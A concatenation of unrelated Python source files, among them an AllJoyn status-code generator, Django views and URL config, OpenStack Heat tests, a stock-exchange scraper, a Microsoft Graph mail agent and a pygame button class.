# any purpose with or without fee is hereby granted, provided that the
# above copyright notice and this permission notice appear in all
# copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
import sys
import os
import getopt
from xml.dom import minidom
from xml.sax.saxutils import escape
# Python < 2.4 has no builtin set type; fall back to the old sets module.
if sys.version_info[:3] < (2,4,0):
    from sets import Set as set
# Records hrefs already processed so each XInclude target is parsed only once.
includeSet = set()
def openFile(name, type):
    """Open *name* with mode *type*; log details and re-raise on I/O failure.

    NOTE(review): 'type' shadows the builtin of the same name (kept for
    compatibility).  Python 2 only -- uses 'except IOError, e' syntax and
    unpacks the exception into (errno, message).
    """
    try:
        return open(name, type)
    except IOError, e:
        errno, errStr = e
        print "I/O Operation on %s failed" % name
        print "I/O Error(%d): %s" % (errno, errStr)
        raise e
def main(argv=None):
"""
make_status --code <code_file> --base <base_dir> [--deps <dep_file>] [--help]
Where:
<code_file> - Output "Java" code
<base_dir> - Root directory for xi:include directives
<dep_file> - Ouput makefile dependency file
"""
global codeOut
global depOut
global isFirst
global fileArgs
global baseDir
codeOut = None
depOut = None
isFirst = True
baseDir = ""
if argv is None:
argv = sys.argv[1:]
try:
opts, fileArgs = getopt.getopt(argv, "h", ["help", "code=", "dep=", "base="])
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
return 0
if o in ("--code"):
codeOut = openFile(a, 'w')
if o in ("--dep"):
depOut = openFile(a, 'w')
if o in ("--base"):
baseDir = a
if None == codeOut:
raise Error("Must specify --code")
writeHeaders()
for arg in fileArgs:
ret = parseDocument(arg)
writeFooters()
if None != codeOut:
codeOut.close()
if None != depOut:
depOut.close()
except getopt.error, msg:
print msg
print "for help use --help"
return 1
except Exception, e:
print "ERROR: %s" % e
if None != codeOut:
os.unlink(codeOut.name)
if None != depOut:
os.unlink(depOut.name)
return 1
return 0
def writeHeaders():
    """Write the makefile-dependency rule header and the fixed Java preamble."""
    global codeOut
    global depOut
    global fileArgs
    if None != depOut:
        # BUG FIX: the format string was "%s %s %s:" with only two arguments,
        # which raised "TypeError: not enough arguments for format string"
        # whenever --dep was given.  Emit both output files as rule targets.
        depOut.write("%s %s:" % (depOut.name, codeOut.name))
        for arg in fileArgs:
            depOut.write(" \\\n %s" % arg)
    if None != codeOut:
        codeOut.write("""/* This file is auto-generated. Do not modify. */
/*
 * Copyright (c) Open Connectivity Foundation (OCF), AllJoyn Open Source
 * Project (AJOSP) Contributors and others.
 *
 * SPDX-License-Identifier: Apache-2.0
 *
 * All rights reserved. This program and the accompanying materials are
 * made available under the terms of the Apache License, Version 2.0
 * which accompanies this distribution, and is available at
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Copyright (c) Open Connectivity Foundation and Contributors to AllSeen
 * Alliance. All rights reserved.
 *
 * Permission to use, copy, modify, and/or distribute this software for
 * any purpose with or without fee is hereby granted, provided that the
 * above copyright notice and this permission notice appear in all
 * copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL
 * WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
 * AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
 * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
 * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
 * TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
 * PERFORMANCE OF THIS SOFTWARE.
 */
package org.alljoyn.bus;
/**
 * Standard function return codes for this package.
 */
public enum Status {
""")
def writeFooters():
    """Terminate the dependency rule and close out the generated Java enum."""
    global codeOut
    global depOut
    if None != depOut:
        depOut.write("\n")
    if None != codeOut:
        # Closes the enum-constant list opened by writeHeaders/parseStatusBlock
        # and appends the fixed accessor/constructor boilerplate.
        codeOut.write(""";
    /** Error Code */
    private int errorCode;
    /** Constructor */
    private Status(int errorCode) {
        this.errorCode = errorCode;
    }
    /** Static constructor */
    private static Status create(int errorCode) {
        for (Status s : Status.values()) {
            if (s.getErrorCode() == errorCode) {
                return s;
            }
        }
        return NONE;
    }
    /**
     * Gets the numeric error code.
     *
     * @return the numeric error code
     */
    public int getErrorCode() { return errorCode; }
}
""")
def parseDocument(fileName):
    """Walk the top-level nodes of fileName, dispatching status blocks and XIncludes."""
    dom = minidom.parse(fileName)
    for node in dom.childNodes:
        is_xinclude = (node.localName == 'include'
                       and node.namespaceURI == 'http://www.w3.org/2001/XInclude')
        if node.localName == 'status_block':
            parseStatusBlock(node)
        elif is_xinclude:
            parseInclude(node)
    dom.unlink()
def parseStatusBlock(blockNode):
    """Emit one Java enum constant (with javadoc) per <status> child of blockNode."""
    global codeOut
    global isFirst
    offset = 0
    for node in blockNode.childNodes:
        if node.localName == 'offset':
            offset = int(node.firstChild.data, 0)
        elif node.localName == 'status':
            if None != codeOut:
                # The first constant gets no leading comma; subsequent ones do.
                sep = "" if isFirst else ","
                codeOut.write("%s\n    /** <b><tt>%s</tt></b> %s. */" % (sep, escape(node.getAttribute('value')), escape(node.getAttribute('comment'))))
                codeOut.write("\n    %s(%s)" % (node.getAttribute('name')[3:], node.getAttribute('value')))
            if isFirst:
                isFirst = False
            else:
                offset += 1
        elif node.localName == 'include' and node.namespaceURI == 'http://www.w3.org/2001/XInclude':
            parseInclude(node)
def parseInclude(includeNode):
    """Resolve an XInclude href against baseDir and parse it, at most once per file."""
    global baseDir
    global includeSet
    target = os.path.join(baseDir, includeNode.attributes['href'].nodeValue)
    if target in includeSet:
        return
    includeSet.add(target)
    if None != depOut:
        depOut.write(" \\\n %s" % target)
    parseDocument(target)
def JavaStatus(source):
    """Generate <source>.java from <source>.xml, with includes rooted one level up."""
    generator_args = ['--base=%s' % os.path.abspath('..'),
                      '--code=%s.java' % source,
                      '%s.xml' % source]
    return main(generator_args)
# Script entry point: exit status mirrors main()'s return code.
if __name__ == "__main__":
    sys.exit(main())
|
from django.urls import path, re_path
from evento import views
from .views import ConsolidadoEvento

# django.conf.urls.url() was deprecated in Django 2.0 and removed in 4.0;
# re_path() is the drop-in replacement with identical regex semantics.
urlpatterns = [
    path('evento/', views.HomeView.as_view(), name='homeEvento'),
    path('evento/<int:pk>/', views.EventoDetailView.as_view(), name='evento_detail'),
    path('evento/create/', views.EventoCreateView.as_view(), name='evento_create'),
    path('evento/update/<int:pk>/', views.EventoUpdateView.as_view(), name='evento_update'),
    path('evento/delete/<int:pk>/', views.EventoDeleteView.as_view(), name='evento_delete'),
    re_path(r'^ConsolidadoEvento/', ConsolidadoEvento.as_view(), name='ConsolidadoEvento'),
]
from django.shortcuts import render
from .models import Profile, Skills
from django.core.mail import send_mail
# Create your views here.
def index(request):
    """Render the portfolio landing page; on POST, forward the contact form by email.

    GET and POST both render 'index.html' with the profile and skills querysets;
    a POST additionally sends the submitted message via send_mail.
    """
    profile = Profile.objects.all()
    skills = Skills.objects.all()
    context = {
        'profile': profile,
        'skills': skills,
    }
    if request.method == 'POST':
        # .get() with defaults instead of bare indexing: a missing form field
        # previously raised KeyError and surfaced as a 500 error.
        name = request.POST.get('Name', '')
        email = request.POST.get('Email', '')
        message = request.POST.get('Message', '') + ' ' + email
        send_mail(
            name,
            message,
            email,
            ['josphat.gitogo@gmail.com']
        )
    # Single render for both branches (the original duplicated this call).
    return render(request, 'index.html', context)
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine.cfn import functions
from heat.engine import environment
from heat.engine import function
from heat.engine import resource
from heat.engine import rsrc_defn
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class TestFunction(function.Function):
    """Minimal concrete Function: resolves to 'wibble' and requires >= 2 args."""

    def validate(self):
        # Mirror real intrinsic functions' arity checking so ValidateTest
        # can exercise the validation error path.
        if len(self.args) >= 2:
            return
        raise TypeError(_('Need more arguments'))

    def dependencies(self, path):
        return ['foo', 'bar']

    def result(self):
        return 'wibble'
class TestFunctionKeyError(function.Function):
    """Stub whose result() raises TypeError, to exercise the '???' repr fallback."""
    def result(self):
        raise TypeError
class TestFunctionValueError(function.Function):
    """Stub whose result() raises ValueError, to exercise the '???' repr fallback."""
    def result(self):
        raise ValueError
class TestFunctionResult(function.Function):
    """Stub delegating to the base result(), to test the abstract default behavior."""
    def result(self):
        return super(TestFunctionResult, self).result()
class FunctionTest(common.HeatTestCase):
    """Tests for Function equality, repr/str formatting, and copy semantics.

    NOTE: the expected strings below encode the exact __str__ format of
    heat.engine.function.Function ("<module.Class {fn: args} -> result>",
    with '???' when result() raises) -- keep them in sync with that code.
    """
    def test_equal(self):
        func = TestFunction(None, 'foo', ['bar', 'baz'])
        # A Function compares equal to its resolved result, in both directions.
        self.assertTrue(func == 'wibble')
        self.assertTrue('wibble' == func)
    def test_not_equal(self):
        func = TestFunction(None, 'foo', ['bar', 'baz'])
        self.assertTrue(func != 'foo')
        self.assertTrue('foo' != func)
    def test_equal_func(self):
        # Two functions with equal results compare equal, regardless of args.
        func1 = TestFunction(None, 'foo', ['bar', 'baz'])
        func2 = TestFunction(None, 'blarg', ['wibble', 'quux'])
        self.assertTrue(func1 == func2)
    def test_function_str_value(self):
        func1 = TestFunction(None, 'foo', ['bar', 'baz'])
        expected = '%s %s' % ("<heat.tests.test_function.TestFunction",
                              "{foo: ['bar', 'baz']} -> 'wibble'>")
        self.assertEqual(expected, six.text_type(func1))
    def test_function_stack_reference_none(self):
        func1 = TestFunction(None, 'foo', ['bar', 'baz'])
        self.assertIsNone(func1.stack)
    def test_function_exception_key_error(self):
        # result() raising TypeError shows as '???' in the string form.
        func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
        expected = '%s %s' % ("<heat.tests.test_function.TestFunctionKeyError",
                              "{foo: ['bar', 'baz']} -> ???>")
        self.assertEqual(expected, six.text_type(func1))
    def test_function_eq_exception_key_error(self):
        # When result() raises, comparisons fall back to NotImplemented.
        func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
        func2 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
        result = func1.__eq__(func2)
        self.assertEqual(result, NotImplemented)
    def test_function_ne_exception_key_error(self):
        func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
        func2 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
        result = func1.__ne__(func2)
        self.assertEqual(result, NotImplemented)
    def test_function_exception_value_error(self):
        func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
        expected = '%s %s' % (
            "<heat.tests.test_function.TestFunctionValueError",
            "{foo: ['bar', 'baz']} -> ???>")
        self.assertEqual(expected, six.text_type(func1))
    def test_function_eq_exception_value_error(self):
        func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
        func2 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
        result = func1.__eq__(func2)
        self.assertEqual(result, NotImplemented)
    def test_function_ne_exception_value_error(self):
        func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
        func2 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
        result = func1.__ne__(func2)
        self.assertEqual(result, NotImplemented)
    def test_function_abstract_result(self):
        # The abstract base result() returns the args unresolved.
        func1 = TestFunctionResult(None, 'foo', ['bar', 'baz'])
        expected = '%s %s -> %s' % (
            "<heat.tests.test_function.TestFunctionResult",
            "{foo: ['bar', 'baz']}",
            "{'foo': ['bar', 'baz']}>")
        self.assertEqual(expected, six.text_type(func1))
    def test_copy(self):
        # deepcopy resolves the function into its plain-data form.
        func = TestFunction(None, 'foo', ['bar', 'baz'])
        self.assertEqual({'foo': ['bar', 'baz']}, copy.deepcopy(func))
class ResolveTest(common.HeatTestCase):
    """function.resolve must replace Function objects anywhere in a snippet,
    returning a new container rather than mutating the input."""

    def test_resolve_func(self):
        fn = TestFunction(None, 'foo', ['bar', 'baz'])
        resolved = function.resolve(fn)
        self.assertEqual('wibble', resolved)
        self.assertIsInstance(resolved, str)

    def test_resolve_dict(self):
        fn = TestFunction(None, 'foo', ['bar', 'baz'])
        data = {'foo': 'bar', 'blarg': fn}
        resolved = function.resolve(data)
        self.assertEqual({'foo': 'bar', 'blarg': 'wibble'}, resolved)
        self.assertIsNot(resolved, data)

    def test_resolve_list(self):
        fn = TestFunction(None, 'foo', ['bar', 'baz'])
        data = ['foo', 'bar', 'baz', 'blarg', fn]
        resolved = function.resolve(data)
        self.assertEqual(['foo', 'bar', 'baz', 'blarg', 'wibble'], resolved)
        self.assertIsNot(resolved, data)

    def test_resolve_all(self):
        fn = TestFunction(None, 'foo', ['bar', 'baz'])
        data = ['foo', {'bar': ['baz', {'blarg': fn}]}]
        resolved = function.resolve(data)
        self.assertEqual(['foo', {'bar': ['baz', {'blarg': 'wibble'}]}],
                         resolved)
        self.assertIsNot(resolved, data)
class ValidateTest(common.HeatTestCase):
    """function.validate should surface TestFunction's arity error with a path
    prefix describing where in the snippet the failing function sits."""
    def setUp(self):
        super(ValidateTest, self).setUp()
        self.func = TestFunction(None, 'foo', ['bar', 'baz'])
    def test_validate_func(self):
        self.assertIsNone(function.validate(self.func))
        self.func = TestFunction(None, 'foo', ['bar'])
        self.assertRaisesRegexp(exception.StackValidationFailed,
                                '.foo: Need more arguments',
                                function.validate, self.func)
    def test_validate_dict(self):
        snippet = {'foo': 'bar', 'blarg': self.func}
        function.validate(snippet)
        self.func = TestFunction(None, 'foo', ['bar'])
        snippet = {'foo': 'bar', 'blarg': self.func}
        self.assertRaisesRegexp(exception.StackValidationFailed,
                                '.blarg.foo: Need more arguments',
                                function.validate, snippet)
    def test_validate_list(self):
        snippet = ['foo', 'bar', 'baz', 'blarg', self.func]
        function.validate(snippet)
        self.func = TestFunction(None, 'foo', ['bar'])
        # NOTE(review): this reassignment uses the *dict* snippet from
        # test_validate_dict (copy-paste?) so the failing case never tests a
        # list -- confirm intent before changing the expected path regex.
        snippet = {'foo': 'bar', 'blarg': self.func}
        self.assertRaisesRegexp(exception.StackValidationFailed,
                                '.blarg.foo: Need more arguments',
                                function.validate, snippet)
    def test_validate_all(self):
        snippet = ['foo', {'bar': ['baz', {'blarg': self.func}]}]
        function.validate(snippet)
        self.func = TestFunction(None, 'foo', ['bar'])
        # NOTE(review): same copy-paste pattern as test_validate_list -- the
        # failing case validates a flat dict, not the nested structure above.
        snippet = {'foo': 'bar', 'blarg': self.func}
        self.assertRaisesRegexp(exception.StackValidationFailed,
                                '.blarg.foo: Need more arguments',
                                function.validate, snippet)
class DependenciesTest(common.HeatTestCase):
    """function.dependencies must find a Function however deeply it is nested.

    The 'scenarios' class attribute drives testscenarios: test_dependencies
    runs once per entry with self.snippet bound accordingly.
    """
    # Shared stub; its dependencies() always reports ['foo', 'bar'].
    func = TestFunction(None, 'test', None)
    scenarios = [
        ('function', dict(snippet=func)),
        ('nested_map', dict(snippet={'wibble': func})),
        ('nested_list', dict(snippet=['wibble', func])),
        ('deep_nested', dict(snippet=[{'wibble': ['wibble', func]}])),
    ]
    def test_dependencies(self):
        deps = list(function.dependencies(self.snippet))
        self.assertIn('foo', deps)
        self.assertIn('bar', deps)
        self.assertEqual(2, len(deps))
class ValidateGetAttTest(common.HeatTestCase):
    """Validation behavior of the cfn Fn::GetAtt intrinsic against a live stack."""
    def setUp(self):
        super(ValidateGetAttTest, self).setUp()
        # Map two test resource types: a generic one, and one whose FnGetAtt
        # is overridden (so unknown attributes are not rejected up front).
        env = environment.Environment()
        env.load({u'resource_registry':
                  {u'OS::Test::GenericResource': u'GenericResourceType'}})
        env.load({u'resource_registry':
                  {u'OS::Test::FakeResource': u'OverwrittenFnGetAttType'}})
        self.stack = stack.Stack(
            utils.dummy_context(), 'test_stack',
            template.Template({"HeatTemplateFormatVersion": "2012-12-12"},
                              env=env),
            stack_id=str(uuid.uuid4()))
        res_defn = rsrc_defn.ResourceDefinition('test_rsrc',
                                                'OS::Test::GenericResource')
        self.rsrc = resource.Resource('test_rsrc', res_defn, self.stack)
        self.stack.add_resource(self.rsrc)
    def test_resource_is_appear_in_stack(self):
        # Referencing an existing resource + attribute validates cleanly.
        func = functions.GetAtt(self.stack, 'Fn::GetAtt',
                                [self.rsrc.name, 'Foo'])
        self.assertIsNone(func.validate())
    def test_resource_is_not_appear_in_stack(self):
        # Removing the resource makes the reference invalid.
        self.stack.remove_resource(self.rsrc.name)
        func = functions.GetAtt(self.stack, 'Fn::GetAtt',
                                [self.rsrc.name, 'Foo'])
        ex = self.assertRaises(exception.InvalidTemplateReference,
                               func.validate)
        self.assertEqual('The specified reference "test_rsrc" (in unknown) '
                         'is incorrect.', six.text_type(ex))
    def test_resource_no_attribute_with_default_fn_get_att(self):
        # Unknown attribute on a default-FnGetAtt resource is rejected.
        func = functions.GetAtt(self.stack, 'Fn::GetAtt',
                                [self.rsrc.name, 'Bar'])
        ex = self.assertRaises(exception.InvalidTemplateAttribute,
                               func.validate)
        self.assertEqual('The Referenced Attribute (test_rsrc Bar) '
                         'is incorrect.', six.text_type(ex))
    def test_resource_no_attribute_with_overwritten_fn_get_att(self):
        # With an overridden FnGetAtt and an empty attribute schema,
        # validation cannot reject the attribute name and so passes.
        res_defn = rsrc_defn.ResourceDefinition('test_rsrc',
                                                'OS::Test::FakeResource')
        self.rsrc = resource.Resource('test_rsrc', res_defn, self.stack)
        self.stack.add_resource(self.rsrc)
        self.rsrc.attributes_schema = {}
        func = functions.GetAtt(self.stack, 'Fn::GetAtt',
                                [self.rsrc.name, 'Foo'])
        self.assertIsNone(func.validate())
    def test_get_attr_without_attribute_name(self):
        # GetAtt requires [resource_name, attribute]; one element is an error.
        ex = self.assertRaises(ValueError, functions.GetAtt,
                               self.stack, 'Fn::GetAtt', [self.rsrc.name])
        self.assertEqual('Arguments to "Fn::GetAtt" must be '
                         'of the form [resource_name, attribute]',
                         six.text_type(ex))
|
import requests
from bs4 import BeautifulSoup

# Historical quotes page of the Madrid stock exchange for one ISIN.
url = "https://www.bolsamadrid.es/esp/aspx/Empresas/InfHistorica.aspx?ISIN=ES0125220311&ClvEmis=25220"
historico = requests.get(url)
soup = BeautifulSoup(historico.text, 'html.parser')
# Get the first date of the history (default date range served by the page).
stock_price_list = soup.find(id='ctl00_Contenido_tblDatos')
first_date = stock_price_list.tr.next_sibling
print('Fecha minima inicial')
print(first_date.td.string)
print()
# The postback must be form-url-encoded for ASP.NET to accept it.
headers = {"Content-Type": "application/x-www-form-urlencoded"}
#data = "__VIEWSTATE=aWd24Hetn%2F7hc9v9QS8JxB3IcDJn6pm%2BVwo47jOyUwBUcPHwkSXuymigdhDR0RfPfmKWgaSJdm%2F%2BzEwiT5IVtDXuA87XhmdqznKmDfAA6F3mn8rekZN5Hcc5VlIldXaRfuGYkySTZv7q8Q6SUKN11KDockijh1k2q8TykbNOecUxcZkayp72VjM0Dv7%2FpveT5G%2BWWu8q2ED6%2B4etSNiyWyZm2FlX0Dv%2FYhUSIM03%2FH6Y4C%2F4dByVTlJxd%2Bk8I%2Bqs5q%2FEUHzY1%2FgT41s4twb5z5BFpEqrwNUi4sQPzrMXXcbYIPepUG93UI48%2BB7YhaU66fgcObbF7Hy4%2FT4%2FwjeCD7VrkHjcj%2FbErEfw1siroiDk486XNPHuO3T6zcU0H%2FtSpOldT6f8cy2r8M18Y5qGYlpvRW4CD2W7RFy%2FrUO8S5B%2BVQ7PdFYx19aRkwaMaSYafhZecVU6jxFLWJygcmqvmqFP%2BNzx7xwIs2S9jLEyJ%2Fb3i3DTRVhrN02h404SYiqI1G14D%2BCw2SQtPhOoMQoCU3q2KOtRFszTxG3Dmrn7dUNWudnUs9s%2FtnRgjiT8JMHQK38dFWJP2S2rqRyvUJOmjOwrbSpahqIHkIaYc0babbscxWMo0nTKz2ry6Ua4nI2HjWnAAyf7HwWfqIT3ik1ZNF1mPuw%3D&__VIEWSTATEGENERATOR=1538A4A5&__EVENTVALIDATION=W7RUMYmlXBDtr1L5xNo9RgnVFrUtNEINt8xgp7YqieDuDunRdF3qvo6sE6jjWkasyRNDVVKWrE%2BnVbl58GOXxd0pS%2FyTgD6vkkkcHHyWcJRkVXcjcDKcTsdjeyBDAWxAFHQXBV2Y8ZwoGRtUlGWfesdLL%2F5d%2B0PEiq5ffXKSOMczDj8UzeOBQylkonRTXO1RDUEz1%2BLH4ovnKylc0gvS1fX3mYc6DUR%2BRMXrkqqH9Nk7o%2BNgbou2GjFQwmsIesHIyPYLOsPaxO1oFsRCFT4WrRXcBsM%3D&ctl00%24Contenido%24Desde%24Dia=24&ctl00%24Contenido%24Desde%24Mes=09&ctl00%24Contenido%24Desde%24A%C3%B1o=2019&ctl00%24Contenido%24Hasta%24Dia=23&ctl00%24Contenido%24Hasta%24Mes=10&ctl00%24Contenido%24Hasta%24A%C3%B1o=2019&ctl00%24Contenido%24Buscar=+Buscar+"
def getFormData(soup, initialDay, initialMonth, initialYear, finalDay, finalMonth, finalYear):
    """Build the ASP.NET POST payload for the date-range query form.

    The hidden __VIEWSTATE/__EVENTVALIDATION tokens are scraped from the
    previously fetched page so the server accepts the postback.
    """
    def hidden(field_id):
        # Hidden ASP.NET inputs carry their token in the 'value' attribute.
        return soup.find(id=field_id)['value']

    form = {'__EVENTTARGET': '', '__EVENTARGUMENT': ''}
    for token in ('__VIEWSTATE', '__VIEWSTATEGENERATOR', '__EVENTVALIDATION'):
        form[token] = hidden(token)
    date_fields = (('Desde', (initialDay, initialMonth, initialYear)),
                   ('Hasta', (finalDay, finalMonth, finalYear)))
    for prefix, (dia, mes, anyo) in date_fields:
        form['ctl00$Contenido$%s$Dia' % prefix] = dia
        form['ctl00$Contenido$%s$Mes' % prefix] = mes
        form['ctl00$Contenido$%s$Año' % prefix] = anyo
    form['ctl00$Contenido$Buscar'] = 'Buscar'
    return form
# Request the same page again, now with an explicit date range.
data = getFormData(soup,10,2,2020,5,10,2020)
page = requests.post(url, data=data, headers = headers)
bs = BeautifulSoup(page.content, 'html.parser')
# Get the first date of the history after the query.
stock_price_list = bs.find(id='ctl00_Contenido_tblDatos')
first_date = stock_price_list.tr.next_sibling
print('Fecha mínima despues de consulta')
print(first_date.td.string)
print()
#print(bs)
|
# Generated by Django 3.1 on 2020-09-16 06:52
from django.db import migrations
class Migration(migrations.Migration):
    """Rename PackageLine.fulfilmentline to the standard spelling."""

    dependencies = [
        ('package', '0006_auto_20200916_1440'),
    ]

    operations = [
        # Pure column rename; no data is transformed.
        migrations.RenameField(
            model_name='packageline',
            old_name='fulfilmentline',
            new_name='fulfillmentline',
        ),
    ]
|
import json
import shutil
import os
from . import utils
class PatchesCollection(object):
    """Directory-backed collection of image patches (plus optional masks).

    Layout: ``<path>/patches.json`` holds metadata, ``<path>/images/`` and
    ``<path>/masks/`` hold the patch files. Every key of patches.json is
    mirrored as an attribute on the instance (see sync_patches_json).
    """

    def __init__(self, path):
        self.path = path
        self.json_path = os.path.join(self.path, 'patches.json')
        # The collection "exists" iff its metadata file is present.
        self.exists = os.path.isfile(self.json_path)
        self.patches_json = {}
        self.images = []
        self.masks = []
        if self.exists:
            with open(self.json_path, 'r') as f:
                self.patches_json = json.load(f)
            self.sync_patches_json()

    def create(self, crop_dimension, has_masks=True):
        """Initialise the on-disk layout; raises if it already exists."""
        if self.exists:
            raise RuntimeError('The patches collection already exists. Destroy it first.')
        self.patches_json = {
            'crop_dimension': crop_dimension,
        }
        utils.ensure_dir(self.get_images_path())
        if has_masks:
            utils.ensure_dir(self.get_masks_path())
        self.store_patches_json()
        self.sync_patches_json()
        self.exists = True

    def get_images_path(self):
        """Directory that stores the image patches."""
        return os.path.join(self.path, 'images')

    def get_images_paths(self):
        """Full paths of all image patch files."""
        base = self.get_images_path()
        return [os.path.join(base, file) for file in self.images]

    def get_masks_path(self):
        """Directory that stores the mask patches."""
        return os.path.join(self.path, 'masks')

    def get_masks_paths(self):
        """Full paths of all mask patch files."""
        base = self.get_masks_path()
        return [os.path.join(base, file) for file in self.masks]

    def store_patches_json(self):
        """Write the metadata dict back to patches.json."""
        utils.ensure_dir(self.path)
        with open(self.json_path, 'w') as f:
            json.dump(self.patches_json, f, indent=3)

    def sync_patches_json(self):
        """Mirror every metadata key as an instance attribute."""
        for key, value in self.patches_json.items():
            setattr(self, key, value)

    def fill(self, values):
        """Merge *values* into the metadata, persist and re-sync it."""
        self.patches_json.update(values)
        self.store_patches_json()
        self.sync_patches_json()

    def destroy(self):
        """Delete the collection from disk and reset the in-memory state."""
        shutil.rmtree(self.path)
        for key in self.patches_json:
            if hasattr(self, key):
                delattr(self, key)
        self.patches_json = {}
        # Bug fix: was `self.image = []` (typo), which left the stale
        # `images` list populated after destroying the collection.
        self.images = []
        self.masks = []
        self.exists = False
|
import logging
import os
from abc import abstractmethod, ABC
from msgraph_async import GraphAdminClient
from msgraph_async.common import GraphClientException
from ModernRelay import exceptions
class DeliveryAgentBase(ABC):
    """Abstract base class for delivery agents.

    Subclass this and decorate the subclass with
    ``@DeliveryAgentBase.register_subclass(<name>)`` to make it creatable
    through :meth:`create`.
    """

    # Registry mapping agent names to their implementing classes.
    subclasses = {}

    def __init__(self):
        self.logger = logging.getLogger("ModernRelay.log")

    @classmethod
    def register_subclass(cls, agent):
        """Class decorator: register the decorated class under *agent*."""
        def _register(subclass):
            cls.subclasses[agent] = subclass
            return subclass
        return _register

    @classmethod
    def create(cls, agent):
        """Instantiate the agent class registered under *agent*."""
        registered = cls.subclasses.get(agent)
        if registered is None:
            raise exceptions.DeliveryAgentException(f"Agent type {agent} not registered in "
                                                    f"DeliveryAgentBase.subclasses! Did you decorate your class with "
                                                    f"@DeliveryAgentBase.register_subclass()?")
        return registered()

    @abstractmethod
    async def send_mail(self, message: dict, headers: dict = None, attachments: dict = None) -> bool:
        pass
@DeliveryAgentBase.register_subclass('GraphDeliveryAgent')
class GraphDeliveryAgent(DeliveryAgentBase):
    """Delivery agent that relays mail through the Microsoft Graph API."""

    # All three credentials must be present in the environment.
    _REQUIRED_ENV = ('MR_MS365_APP_ID', 'MR_MS365_APP_SECRET', 'MR_MS365_TENANT_ID')

    def __init__(self):
        super().__init__()
        # Client is created lazily on the first send_mail call.
        self.graph = None
        for name in self._REQUIRED_ENV:
            if not os.getenv(name):
                raise exceptions.DeliveryAgentException(f"Environment variable {name} is not set!")

    async def send_mail(self, message: dict, headers: dict = None, attachments: dict = None) -> bool:
        """Send *message* via Graph; return True on a 2xx response.

        All failures are logged and swallowed (best-effort delivery).
        """
        if not self.graph:
            self.graph = GraphAdminClient()
        succeeded = False
        try:
            # Acquire/refresh the app token once per client lifetime.
            if not self.graph.is_managed:
                await self.graph.manage_token(os.getenv('MR_MS365_APP_ID'),
                                              os.getenv('MR_MS365_APP_SECRET'),
                                              os.getenv('MR_MS365_TENANT_ID'))
            # Translate the MIME content type into Graph's body-type enum.
            message['body_type'] = "HTML" if message['body_type'] == "text/html" else "Text"
            resp = await self.graph.send_mail(
                message,
                headers=headers,
                attachments=attachments)
            # resp[-1] is treated as the HTTP status code for success checks
            # (NOTE: the debug labels below look swapped — confirm against
            # msgraph_async's send_mail return value).
            succeeded = 200 <= resp[-1] < 300
            self.logger.debug(f"GraphDeliveryAgent:send_mail: HTTP Response: {resp[-1]}, HTTP Status:{resp[0]}")
        except GraphClientException as ex:
            self.logger.exception(f"Error: sendmail failed. {ex.message}")
        except Exception as ex:
            self.logger.exception(f"Error: sendmail failed at authentication. {ex.args[0]}")
        return succeeded
|
import os

import boto3

# Module-level client so Lambda re-uses the connection on warm invocations.
ssm = boto3.client("ssm")

# Name of the SSM parameter that tracks the current shadow endpoint.
SHADOW_ENDPOINT_SSM = os.environ.get("SHADOW_ENDPOINT_SSM")


def lambda_handler(event, context):
    """Store the triggering job's name in SSM as the shadow endpoint name.

    Expects ``event["job_name"]``; overwrites any existing parameter value.
    Returns the SSM ``put_parameter`` response so callers can inspect the
    new parameter version.
    """
    print(event)
    # Fix: renamed from `shadow_endpont_name`; the dict(event) copy was
    # unnecessary for a single key lookup.
    shadow_endpoint_name = event["job_name"]
    response = ssm.put_parameter(
        Name=SHADOW_ENDPOINT_SSM, Value=shadow_endpoint_name, Overwrite=True
    )
    return response
|
import pygame
from os import path
from sys import argv
class Button:
    """A clickable pygame button that highlights (and clicks) on mouse-over."""

    def __init__(self, position, value, label):
        resourceRoot = path.dirname(argv[0])
        # Hover sound played on a dedicated mixer channel.
        self.buttonSound = pygame.mixer.Sound(resourceRoot + "/resources/audio/button.wav")
        self.buttonSound.set_volume(.25)
        self.buttonSoundChannel = pygame.mixer.Channel(5)

        # Render the label once onto both button states, centred.
        labelFont = pygame.font.SysFont('krungthep', 25)
